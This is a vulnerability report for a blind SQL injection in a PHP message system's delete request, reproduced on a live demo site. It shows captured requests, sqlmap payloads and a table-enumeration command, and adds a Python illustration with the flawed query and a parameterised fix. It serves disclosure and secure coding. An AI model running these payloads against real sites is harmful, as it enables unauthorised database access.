### Brief description:
SQL injection in an information publishing system (reproduced on the demo)
### Details:
SQL injection in an information publishing system (reproduced on the demo)
### Proof of vulnerability:
The injection is here:
[![360截图20150228155750951.jpg](https://images.seebug.org/upload/201502/2815580956e2e4ed7bd5b1e209f9ade47d981fcd.jpg)](https://images.seebug.org/upload/201502/2815580956e2e4ed7bd5b1e209f9ade47d981fcd.jpg)
Capture the request and take a look:
```http
POST /index.php HTTP/1.1
Host: pmbdemo.youyax.com
Proxy-Connection: keep-alive
Content-Length: 21
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://pmbdemo.youyax.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://pmbdemo.youyax.com/index.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=e3036ed3248be3f189e336878c8e542f

ck%5B%5D=2&sub_lists=
```
Feed the request to sqlmap and look at the parameter:
```
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ck[] (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: ck[]=2 RLIKE (SELECT (CASE WHEN (3364=3364) THEN 2 ELSE 0x28 END))&sub_lists=

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: ck[]=2 AND SLEEP(5)&sub_lists=
---
[23:07:04] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29, Apache 2
back-end DBMS: MySQL 5.0.11
[23:07:04] [INFO] fetching current database
```
[![360截图20150228155840478.jpg](https://images.seebug.org/upload/201502/281558475acd208eea42e76224f15e4fb4ab4340.jpg)](https://images.seebug.org/upload/201502/281558475acd208eea42e76224f15e4fb4ab4340.jpg)
Where the problem lies is now obvious: the values of the `ck[]` array in the POST body reach the SQL query unsanitized.
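The report does not show the application's PHP source, so the following is an added illustration (not the vendor's code) of the pattern the sqlmap output points at, written in Python over an in-memory SQLite table. The `messages` schema, the `owner` column and the shape of the delete handler are assumptions; the injected expression is the report's own boolean-based payload with the MySQL-only `RLIKE` dropped and `0x28` written as `40` so that SQLite can evaluate it. The vulnerable function concatenates the `ck[]` values into the `IN (...)` list, so a true condition in the payload deletes a row and a false one does not (the oracle sqlmap exploits); the hardened function whitelists each value as an unsigned integer and binds it with a placeholder.

```python
import sqlite3


# Constructed stand-in for the application's message table. The real schema of
# youyaxco_pmb is not on the page; table and column names here are assumptions.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE messages (id INTEGER PRIMARY KEY, owner INTEGER, body TEXT)"
    )
    conn.executemany(
        "INSERT INTO messages VALUES (?, ?, ?)",
        [(1, 100, "first message of user 100"),
         (2, 100, "second message of user 100"),
         (3, 200, "message of user 200")],
    )
    return conn


def remaining_ids(conn):
    """Ids still present, used to observe what a delete actually touched."""
    return [row[0] for row in conn.execute("SELECT id FROM messages ORDER BY id")]


def delete_vulnerable(conn, owner, ck):
    """Assumed shape of the flaw: every ck[] value is pasted into the IN list,
    so an attacker-controlled expression is evaluated by the database."""
    ids = ",".join(ck)
    sql = f"DELETE FROM messages WHERE owner = {int(owner)} AND id IN ({ids})"
    return conn.execute(sql).rowcount


def delete_hardened(conn, owner, ck):
    """Whitelist each ck[] value as an unsigned integer, then bind the values
    with placeholders; the database never interprets them as SQL."""
    ids = []
    for value in ck:
        if not value.isdigit():
            raise ValueError(f"ck[] value is not an integer id: {value!r}")
        ids.append(int(value))
    if not ids:
        return 0
    placeholders = ",".join("?" * len(ids))
    sql = f"DELETE FROM messages WHERE owner = ? AND id IN ({placeholders})"
    return conn.execute(sql, [int(owner), *ids]).rowcount


# The report's boolean-based payload without RLIKE (MySQL only) and with 0x28
# spelled as 40. A true condition makes the subquery yield id 2, a false one 40.
TRUE_PAYLOAD = "(SELECT (CASE WHEN (3364=3364) THEN 2 ELSE 40 END))"
FALSE_PAYLOAD = "(SELECT (CASE WHEN (3364=3365) THEN 2 ELSE 40 END))"

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, false condition:", delete_vulnerable(conn, 100, [FALSE_PAYLOAD]), "row(s)")
    print("vulnerable, true condition :", delete_vulnerable(conn, 100, [TRUE_PAYLOAD]), "row(s)")
    print("remaining ids:", remaining_ids(conn))
    conn = make_db()
    try:
        delete_hardened(conn, 100, [TRUE_PAYLOAD])
    except ValueError as err:
        print("hardened rejected payload:", err)
    print("hardened, own id 2         :", delete_hardened(conn, 100, ["2"]), "row(s)")
    print("hardened, other user's id 3:", delete_hardened(conn, 100, ["3"]), "row(s)")
```

The ownership predicate in the hardened query is the second half of the fix: besides parameterizing, a delete driven by client-supplied ids should be scoped to the current user's rows, so that a valid-looking id belonging to someone else deletes nothing.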
Let's reproduce the injection on the demo. First register and log in, then pick any user and send them a message:
[![360截图20150228155750951.jpg](https://images.seebug.org/upload/201502/28155925d985a53f0744ec2942b67ed00918155e.jpg)](https://images.seebug.org/upload/201502/28155925d985a53f0744ec2942b67ed00918155e.jpg)
Then go to the control panel, click delete, and capture the request:
[![360截图20150228155955829.jpg](https://images.seebug.org/upload/201502/28160007f04014c25e5134d8f1e886a7b6b3665d.jpg)](https://images.seebug.org/upload/201502/28160007f04014c25e5134d8f1e886a7b6b3665d.jpg)
Save the POST request and send it:
```http
POST /index.php HTTP/1.1
Host: pmbdemo.youyax.com
Proxy-Connection: keep-alive
Content-Length: 21
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://pmbdemo.youyax.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://pmbdemo.youyax.com/index.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=e3036ed3248be3f189e336878c8e542f

ck%5B%5D=3&sub_lists=
```
[![360截图20150228160037565.jpg](https://images.seebug.org/upload/201502/28160045bbea315daa29f025988607eec16d5e70.jpg)](https://images.seebug.org/upload/201502/28160045bbea315daa29f025988607eec16d5e70.jpg)
List the tables:
```shell
sqlmap.py -r 2.txt -v 1 --tables -D "youyaxco_pmb"
```
[![360截图20150228160113382.jpg](https://images.seebug.org/upload/201502/28160121950fb373d1fb8f6d1fc8c1a8887a47e2.jpg)](https://images.seebug.org/upload/201502/28160121950fb373d1fb8f6d1fc8c1a8887a47e2.jpg)